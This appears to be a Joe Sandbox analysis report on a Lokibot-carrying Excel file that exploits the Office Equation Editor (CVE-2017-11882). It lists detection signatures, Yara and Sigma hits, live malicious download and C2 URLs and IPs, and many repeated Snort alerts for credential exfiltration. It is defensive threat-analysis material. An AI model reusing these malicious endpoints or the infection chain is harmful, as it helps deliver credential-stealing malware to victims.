Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report MV NAGOYA TRADER.xlsx

Overview

General Information

Sample Name:MV NAGOYA TRADER.xlsx
Analysis ID:332678
MD5:dd41f88e3d53755f0aa1318bf473d08b
SHA1:54ccf49aaf860ab2531b37dd38adc0273b6f2551
SHA256:6f68432c8c109e52980cef46236114266c97a5791808053b07a943d7686f8f55
Tags:LokiVelvetSweatshopxlsx

Most interesting Screenshot:

Detection

Lokibot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected AntiVM_3
Yara detected Lokibot
Binary contains a suspicious time stamp
Drops PE files to the user root directory
Found C&C like URL pattern
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Sigma detected: Executables Started in Suspicious Folder
Sigma detected: Execution in Non-Executable Folder
Sigma detected: Suspicious Program Location Process Starts
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Tries to steal Mail credentials (via file registry)
Yara detected aPLib compressed binary
Allocates a big amount of memory (probably used for heap spraying)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Searches the installation path of Mozilla Firefox
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2520 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • EQNEDT32.EXE (PID: 2320 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2952 cmdline: 'C:\Users\Public\vbc.exe' MD5: 3EE960D7D595C82B47CE28164AFED056)
      • vbc.exe (PID: 3040 cmdline: {path} MD5: 3EE960D7D595C82B47CE28164AFED056)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.2391430230.0000000000400000.00000040.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000005.00000002.2391430230.0000000000400000.00000040.00000001.sdmpJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
      00000005.00000002.2391430230.0000000000400000.00000040.00000001.sdmpJoeSecurity_LokibotYara detected LokibotJoe Security
        00000005.00000002.2391430230.0000000000400000.00000040.00000001.sdmpLoki_1Loki Payloadkevoreilly
        • 0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
        • 0x153fc:$a2: last_compatible_version
        00000005.00000002.2391430230.0000000000400000.00000040.00000001.sdmpLokibotdetect Lokibot in memoryJPCERT/CC Incident Response Group
        • 0x13bff:$des3: 68 03 66 00 00
        • 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
        • 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
        Click to see the 15 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        5.2.vbc.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          5.2.vbc.exe.400000.0.unpackJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
            5.2.vbc.exe.400000.0.unpackJoeSecurity_LokibotYara detected LokibotJoe Security
              5.2.vbc.exe.400000.0.unpackLoki_1Loki Payloadkevoreilly
              • 0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
              • 0x13ffc:$a2: last_compatible_version
              5.2.vbc.exe.400000.0.unpackLokibotdetect Lokibot in memoryJPCERT/CC Incident Response Group
              • 0x12fff:$des3: 68 03 66 00 00
              • 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
              • 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
              Click to see the 5 entries

              Sigma Overview

              System Summary:

              barindex
              Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
              Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2320, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2952
              Sigma detected: EQNEDT32.EXE connecting to internetShow sources
              Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 103.141.138.119, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2320, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167
              Sigma detected: File Dropped By EQNEDT32EXEShow sources
              Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2320, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe
              Sigma detected: Executables Started in Suspicious FolderShow sources
              Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2320, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2952
              Sigma detected: Execution in Non-Executable FolderShow sources
              Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2320, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2952
              Sigma detected: Suspicious Program Location Process StartsShow sources
              Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2320, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2952

              Signature Overview

              Click to jump to signature section

              Show All Signature Results

              AV Detection:

              barindex
              Antivirus detection for URL or domainShow sources
              Source: http://chnesstdyqudusisabadassniggainthestfmv.ydns.eu/secure/svchost.exeAvira URL Cloud: Label: malware
              Multi AV Scanner detection for domain / URLShow sources
              Source: begadi.gaVirustotal: Detection: 12%Perma Link
              Source: http://chnesstdyqudusisabadassniggainthestfmv.ydns.eu/secure/svchost.exeVirustotal: Detection: 6%Perma Link
              Source: http://begadi.ga/chud/gate.phpVirustotal: Detection: 13%Perma Link
              Multi AV Scanner detection for dropped fileShow sources
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exeReversingLabs: Detection: 32%
              Source: C:\Users\Public\vbc.exeReversingLabs: Detection: 32%
              Multi AV Scanner detection for submitted fileShow sources
              Source: MV NAGOYA TRADER.xlsxVirustotal: Detection: 31%Perma Link
              Source: MV NAGOYA TRADER.xlsxReversingLabs: Detection: 25%
              Machine Learning detection for dropped fileShow sources
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exeJoe Sandbox ML: detected
              Source: C:\Users\Public\vbc.exeJoe Sandbox ML: detected

              Exploits:

              barindex
              Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
              Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
              Source: C:\Users\Public\vbc.exeCode function: 5_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,
              Source: excel.exeMemory has grown: Private usage: 4MB later: 35MB
              Source: C:\Users\Public\vbc.exeCode function: 4x nop then jmp 006E612Dh
              Source: C:\Users\Public\vbc.exeCode function: 4x nop then jmp 006E612Dh
              Source: global trafficDNS query: name: chnesstdyqudusisabadassniggainthestfmv.ydns.eu
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 103.141.138.119:80
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 103.141.138.119:80

              Networking:

              barindex
              Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
              Source: TrafficSnort IDS: 2022550 ET TROJAN Possible Malicious Macro DL EXE Feb 2016 192.168.2.22:49167 -> 103.141.138.119:80
              Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.22:49168 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49168 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49168 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.22:49168 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.22:49168 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.22:49169 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49169 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49169 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.22:49169 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.22:49169 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49170 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49170 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49170 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49170 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.22:49170 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.193.143.118:80 -> 192.168.2.22:49170
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49171 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49171 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49171 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49171 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.22:49171 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.193.143.118:80 -> 192.168.2.22:49171
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49172 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49172 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49172 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49172 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.22:49172 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.193.143.118:80 -> 192.168.2.22:49172
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49173 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49173 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49173 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49173 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.22:49173 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.193.143.118:80 -> 192.168.2.22:49173
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49174 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49174 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49174 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49174 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.22:49174 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.193.143.118:80 -> 192.168.2.22:49174
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49175 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49175 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49175 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49175 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.22:49175 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.193.143.118:80 -> 192.168.2.22:49175
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49176 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49176 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49176 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49176 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.22:49176 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.193.143.118:80 -> 192.168.2.22:49176
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49177 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49177 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49177 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49177 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.22:49177 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.193.143.118:80 -> 192.168.2.22:49177
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49178 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49178 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49178 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49178 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.22:49178 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.193.143.118:80 -> 192.168.2.22:49178
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49179 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49179 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49179 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49179 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.22:49179 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.193.143.118:80 -> 192.168.2.22:49179
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49180 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49180 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49180 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49180 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.22:49180 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.193.143.118:80 -> 192.168.2.22:49180
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49181 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49181 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49181 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49181 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.22:49181 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.193.143.118:80 -> 192.168.2.22:49181
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49182 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49182 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49182 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49182 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.22:49182 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.193.143.118:80 -> 192.168.2.22:49182
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49183 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49183 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49183 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49183 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.22:49183 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.193.143.118:80 -> 192.168.2.22:49183
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49184 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49184 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49184 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49184 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.22:49184 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.193.143.118:80 -> 192.168.2.22:49184
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49185 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49185 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49185 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49185 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.22:49185 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.193.143.118:80 -> 192.168.2.22:49185
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49186 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49186 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49186 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49186 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.22:49186 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.193.143.118:80 -> 192.168.2.22:49186
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49187 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49187 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49187 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49187 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.22:49187 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.193.143.118:80 -> 192.168.2.22:49187
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49188 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49188 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49188 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49188 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.22:49188 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.193.143.118:80 -> 192.168.2.22:49188
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49189 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49189 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49189 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49189 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.22:49189 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.193.143.118:80 -> 192.168.2.22:49189
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49190 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49190 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49190 -> 185.193.143.118:80
